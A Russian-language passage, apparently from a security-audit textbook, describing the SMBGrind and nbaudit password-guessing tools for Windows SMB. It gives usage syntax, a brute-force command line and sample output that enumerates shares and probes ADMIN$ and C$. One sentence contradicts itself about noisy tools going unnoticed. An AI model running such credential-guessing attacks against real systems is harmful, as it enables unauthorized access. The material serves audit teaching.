Средства взлома/подбора паролей
Средства активного взлома
Средства активного взлома являются последним веянием в деле подбора паролей. Они генерируют большое количество паразитного шума в сети и в отношении атакуемой машины (поэтому их деятельность может долгое время оставаться незамеченной). Непременным условие начала активной атаки является наличие правильного имени пользователя на атакуемой системе. В лекции "Средства ревизии Windows" подробно рассказано о приемах получения имени пользователя.
Другим распространенным шагом перед началом атаки является попытка выяснения времени блокирования доступа после ввода неправильного пароля. Если период блокирования составляет 30 минут после того, как пароль введен неправильно пять раз, вы не захотите терять 29 минут 30 секунд на работу, которая не будет иметь успеха.
SMBGrind
Утилита SMBGrind является частью сканера уязвимостей CyberCop. Это утилита командной строки, которая осуществляет подбор паролей, используя имена и пароли из текстового файла.
Реализация
Вдобавок к приобретению и установке комплекта CyberCop, вам понадобится только одно необходимое условие - создать файл для имен пользователей и паролей. Ниже показано применение утилиты.
C:\>smbgrind.exe -i 192.168.209.117 -u users.txt -p pass.txt -v Host address : 192.168.209.117 Userlist : users.txt Passlist : pass.txt Cracking host 192.168.209.117 (*SMBSERVER) Parallel Grinders: 10 Percent complete: 0 Trying: domain\NetAdm administrator Trying: domain\NetAdm Pass!word1 Trying: domain\NetAdm password Trying: domain\NetAdm change%me Trying: administrator administrator Trying: administrator Pass!word1 Trying: administrator password Trying: administrator change%me Percent complete: 75 Trying: guest administrator Trying: guest Pass!word1 Trying: guest password Trying: guest change%me Percent complete: 100 Grinding complete, guessed 0 accounts
SMBGrind - достаточно быстрая программа, но склонная к ошибочным положительным решениям. Программа порождает пакеты со строкой CYBERCOP в качестве полезной нагрузки. Следовательно, деятельность программы может быть обнаружена системами IDS в сети, или строку CYBERCOP можно обнаружить в журнале событий, ведущемся для фиксирования неудавшихся попыток подбора пароля.
Другим недостатком является невозможность направить атаку против конкретных общих ресурсов. Инструмент, который направлен на взлом ресурсов ADMIN$ или C$, в Windows может поставить под угрозу целостность всей системы, но для хитрого взломщика более привлекательным может оказаться доступ к ресурсу "wwwroot".
Nbaudit (nat)
Программа Nbaudit по сравнению с SMBGrind позволяет пользователю сканировать интервал IP-адресов. Это прием чаще применяется для поиска опасных уязвимостей, таких как профиль администратора с пустым паролем.
Реализация
Ниже приведен способ использования программы nbaudit.
usage: nbaudit [-o filename] [-u userlist] [-p passlist] <address>
Параметры userlist и passlist должны быть понятны без разъяснений. Параметр -o используется для задания выходного файла для сообщений о работе nbaudit. Параметр < address > может ввести вас в заблуждение. Он задает адрес или интервал адресов в следующем формате.
- 192.168.0.1. Уникальный IP адрес.
- 192.168.0.1-32. IP между 192.168.0.1 и 192.168.0.32, включая крайние адреса.
- 192.168.0.1-32,200-244. То же самое, что и в предыдущем примере, но добавлены IP-адреса между 192.168.0.200 и 192.168.244.
Ниже приведен пример вывода программы nbaudit.
[*] --- Checking host: 192.168.1.1
[*] --- Obtaining list of remote NetBIOS names
[*] --- Remote systems name tables:
PRINTSERVER
PRINTSERVER
PRINTSERVER
_MSBROWSE_
HOTEL
HOTEL
HOTEL
HOTEL
[*] --- Attempting to connect with name: *
[*] --- CONNECTED with name: *
[*] --- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*] --- Remote server wants us to encrypt, telling it not to
[*] --- Attempting to connect with protocol: LM1.2X002
[*] --- Server time is Mon Jan 28 02:06:08 2002
[*] --- Timezone is UTC-8.0
[*] --- Attempting to establish session
[*] --- Obtained server information:
Server=[*] User=[administrator] Workgroup=[HOTEL] Domain=[HOTEL]
[*]- Obtained listing of shares:
Sharename Type Comment
------- --- ------
IPC IPC: IPC Service (PrintServer)
Printer Printer: Hotel Public Printer
printer$ Disk:
[*] --- This machine has a browse list:
Server Comment
---- ------
PRINTSERVER PrintServer
[*] --- Attempting to access share: \\*\
[*] --- Unable to access
[*] --- Attempting to access share: \\*\printer$
[*] --- WARNING: Able to access share: \\*\printer$
[*] --- Checking write access in: \\*\printer$
[*] --- Attempting to exercise .. bug on: \\*\printer$
[*] --- Attempting to access share: \\*\ADMIN$
[*] --- Unable to access
[*] --- Attempting to access share: \\*\C$
[*] --- Unable to access
[*] --- Attempting to access share: \\*\D$
[*] --- Unable to access
[*] --- Attempting to access share: \\*\ROOT
[*] --- Unable to access
[*] --- Attempting to access share: \\*\WINNT$
[*] --- Unable to accessNbaudit атакует все обнаруженные общие ресурсы. В этом примере программа успешно соединилась с ресурсом printer$ с нулевым паролем. Если программа осуществляет соединение по имени пользователя и паролю из списка, то на выход выдается информация об удачных соединениях. Это повышает их рейтинг, поскольку дает возможность осуществлять соединение с большим количеством общих ресурсов.